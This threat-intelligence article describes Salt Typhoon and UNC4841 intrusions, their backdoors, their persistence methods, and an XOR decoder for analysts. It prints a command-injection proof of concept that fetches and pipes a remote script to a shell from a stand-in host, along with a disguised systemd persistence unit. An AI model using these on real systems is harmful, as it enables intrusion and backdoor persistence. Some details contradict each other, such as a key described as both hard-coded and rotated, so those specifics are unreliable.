Cybersecurity researchers began tracking a sophisticated campaign in the closing months of 2024, targeting both government and corporate networks across multiple continents.
The threat actors behind this operation, known colloquially as Salt Typhoon and UNC4841, leveraged overlapping infrastructure and shared tactics to maximize stealth and persistence.
Initial infiltration was achieved through exploitation of unpatched remote code execution vulnerabilities in public-facing servers, followed by the deployment of bespoke backdoors.
Affected organizations reported anomalous DNS queries and unexplained outbound HTTPS traffic to domains such as pulseathermakf[.]com and infraredsen[.]com, which were later attributed to Salt Typhoon’s command-and-control (C2) network.
Silent Push analysts noted that the adversaries’ infection vector often began with exploitation of a zero-day flaw in enterprise email gateways.
In one documented incident, UNC4841 exploited CVE-2023-2868 in the Barracuda Email Security Gateway Appliance to establish initial access.
Post-exploitation, the attackers uploaded a customized rootkit named Demodex, which facilitated kernel-level persistence and evasion of host-based detection mechanisms.
Around this same time, Salt Typhoon deployed two additional backdoors—Snappybee and Ghostspider—each designed to blend into legitimate traffic patterns by communicating over standard ports and using randomized HTTP headers to avoid signature-based detection.
Silent Push researchers identified the convergence of these two groups when domain registration records revealed shared email registrants and SOA mbox entries tied to gibberish ProtonMail addresses.
This infrastructure overlap suggested a coordinated effort or resource sharing between the two APT clusters.
By correlating WHOIS data with DNS A-record lookups, analysts uncovered over 45 previously unreported domains associated with both threat actors, expanding the known indicator set for proactive defense measures.
Infection and Persistence Mechanisms
The infection chain begins with a crafted HTTP request exploiting vulnerable software modules. A proof-of-concept snippet provided by Silent Push illustrates the exploit’s delivery payload:
import requests

# PoC as quoted in the report: a shell command is injected through the
# unsanitized "cmd" query parameter of the vulnerable endpoint.
exploit_url = "https://victim.example.com/api/exec?cmd="
payload = "wget http://malicious.server/ghostspider.sh -O- | sh"
response = requests.get(exploit_url + payload)
print("Exploit delivered, status:", response.status_code)
Upon successful exploitation, the Ghostspider backdoor script installs as a system service under a randomized name.
The service unit file, discovered on compromised hosts, resembles:
[Unit]
Description=NetworkManager Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/ghostspider --config /etc/ghostspider.conf
[Install]
WantedBy=multi-user.target
This technique ensures automatic execution on boot, while /etc/ghostspider.conf contains encrypted C2 endpoints and sleep timers to throttle network beacons.
To further evade detection, the attackers implemented a dual-layer persistence tactic: first via the service unit and then through a cron job that monitors and restarts the backdoor if terminated.
Silent Push analysts extracted the decryption routine from memory, revealing a lightweight XOR cipher applied to both configuration files and network traffic payloads.
The cipher key, 0x4F, is hard-coded but dynamically rotated every 120 hours, preventing simple static analysis.
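Because a single-byte XOR is its own inverse and has only 256 possible keys, an analyst can recover a rotated key from a captured configuration or payload blob without knowing its current value. The example below is added here and is not code from Silent Push or from the malware; the config sample, its field names and the hostnames are constructed for the example, and only the key value 0x4F comes from the report.

```python
import string
from typing import Dict, Optional

# Constructed sample config (invented here, not recovered from any host),
# XOR-encoded with the single-byte key 0x4F the article names.
KEY = 0x4F
SAMPLE_PLAINTEXT = (
    b"C2=https://c2-a.example.invalid:443|https://c2-b.example.invalid:8443\n"
    b"Sleep=3600 # seconds between beacons, ~15% jitter\n"
    b"Proxy=none\n"
)
SAMPLE_BLOB = bytes(b ^ KEY for b in SAMPLE_PLAINTEXT)
PRINTABLE = frozenset(string.printable.encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key; encoding and decoding are the same step."""
    return bytes(b ^ key for b in data)


def recover_key(blob: bytes, threshold: float = 0.97) -> Optional[int]:
    """Try all 256 keys and keep the one whose output is almost entirely
    printable ASCII; None means nothing cleared the threshold (not single-byte
    XOR, or the key was applied to binary rather than text)."""
    if not blob:
        return None
    scores = {k: sum(b in PRINTABLE for b in xor_bytes(blob, k)) / len(blob)
              for k in range(256)}
    best = max(scores, key=scores.get)
    return best if scores[best] >= threshold else None


def decode_config(blob: bytes) -> Optional[Dict[str, str]]:
    """Recover the key, decode, and parse key=value lines ('#' comments dropped)."""
    key = recover_key(blob)
    if key is None:
        return None
    settings = {}
    for line in xor_bytes(blob, key).decode("ascii", errors="replace").splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            name, _, value = line.partition("=")
            settings[name.strip()] = value.strip()
    return settings


if __name__ == "__main__":
    print("recovered key:", hex(recover_key(SAMPLE_BLOB)))
    print(decode_config(SAMPLE_BLOB))
```

The same routine applies to captured beacon payloads, which the report says use the same cipher; a None result is itself a signal that the sample is not plain single-byte XOR.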
The seamless integration of these infection and persistence tactics underscores the advanced capabilities of Salt Typhoon and UNC4841.
Organizations are urged to audit DNS and WHOIS telemetry for known malicious domains and deploy behavior-based detection to identify anomalous process launches and encrypted C2 traffic.